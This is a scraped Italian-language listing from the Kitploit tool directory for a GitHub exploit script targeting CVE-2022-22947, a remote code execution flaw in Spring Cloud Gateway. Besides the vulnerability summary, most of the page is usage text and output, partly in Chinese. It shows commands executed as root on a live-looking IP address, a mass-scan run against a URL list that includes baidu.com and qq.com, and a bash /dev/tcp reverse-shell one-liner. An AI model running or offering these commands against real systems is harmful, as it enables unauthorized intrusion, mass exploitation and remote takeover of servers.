Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-22947_EXP — Uno script per la verifica singola o batch, che può anche generare una reverse shell. | Kitploit
Strumenti/GitHubGitHub/anansec/cve-2022-22947_exp
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubanansec/cve-2022-22947_exp

CVE-2022-22947_EXP

Uno script per la verifica singola o batch, che può anche generare una reverse shell.

Vedi Repository
714 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

1. Vulnerabilità di esecuzione di codice remoto in Spring Cloud Gateway

Livello di pericolo: Alto

Stato POC/EXP: Pubblico

ID CNVD: CNNVD-2022-16402

ID CVE: CVE-2022-22947

2. Impatto:

    • VMWare Spring Cloud GateWay 3.1.0
    • VMWare Spring Cloud GateWay >=3.0.0, <=3.0.6
    • VMWare Spring Cloud GateWay <3.0.0

3. Descrizione della vulnerabilità

Spring Cloud Gateway presenta una vulnerabilità di esecuzione di codice remoto. Questa vulnerabilità si verifica nell'endpoint Actuator dell'applicazione Spring Cloud Gateway che, quando abilitato, esposto e non sicuro, è suscettibile ad attacchi di code injection. Un attaccante può sfruttare questa vulnerabilità creando richieste malevole che consentono l'esecuzione di comandi arbitrari sull'host remoto.

4. Utilizzo di EXP per CVE-2022-22947

1. Caratteristiche dello script

  1. Supporta la verifica di un singolo target

  2. Supporta la verifica di massa delle vulnerabilità

  3. Supporta reverse shell

2. Parametri dello script

root@kitploit:~
-h    Visualizza le informazioni di aiuto
-u    Specifica l'URL del target
-c    Specifica il comando da eseguire, default: id
-f    Specifica il file con gli URL dei target

3. Utilizzo dello script

1. Verifica di un singolo target

Metodo 1:

root@kitploit:~
E:\pocs>python cve-2022-22947.py

    验证单个目标:
            1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        验证多个目标
            1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
        反弹shell
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、进入交互模式,输入目标和反弹shell的命令

请输入一个目标url地址:http://123.58.236.76:8484
请输入想要执行的命令,默认执行id:whoami
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']

Metodo 2:

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -u http://123.58.236.76:8484 -c whoami

    验证单个目标:
            1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        验证多个目标
            1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
        反弹shell
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、进入交互模式,输入目标和反弹shell的命令

[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['root\\n']

2. Verifica di massa

root@kitploit:~
E:\learn\python\pocs\pocs>python cve-2022-22947.py -f url.txt

    验证单个目标:
            1、python cve-2022-22947.py  进入交互模式后,根据提示输入目标url和需要执行的命令,注意命令的正确性
            2、python cve-2022-22947.py  -u http://example.com -c whoami
        验证多个目标
            1、python cve-2022-22947.py -f url.txt ,将需要验证的目标全部放在url目录下
        反弹shell
            1、python cve-2022-22947.py  -u http://example.com -c "bash -i >& /dev/tcp/ip/port 0>&1"
            2、进入交互模式,输入目标和反弹shell的命令

[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']
[-]目标:http://www.baidu.com,漏洞验证失败,请手动验证!
[-]目标:http://www.qq.com,漏洞验证失败,请手动验证!
[+]目标:http://123.58.236.76:8484 ,成功获取回显命令:['uid=0(root']

3. Reverse shell

root@kitploit:~
python cve-2022-22947.py -u http://123.58.236.76:8484 -c "bash -i >& /dev/tcp/xxx.xxx.xxx/65534 0>&1"

image-20220519233354807

image-20220519233429912

Scarica lo strumento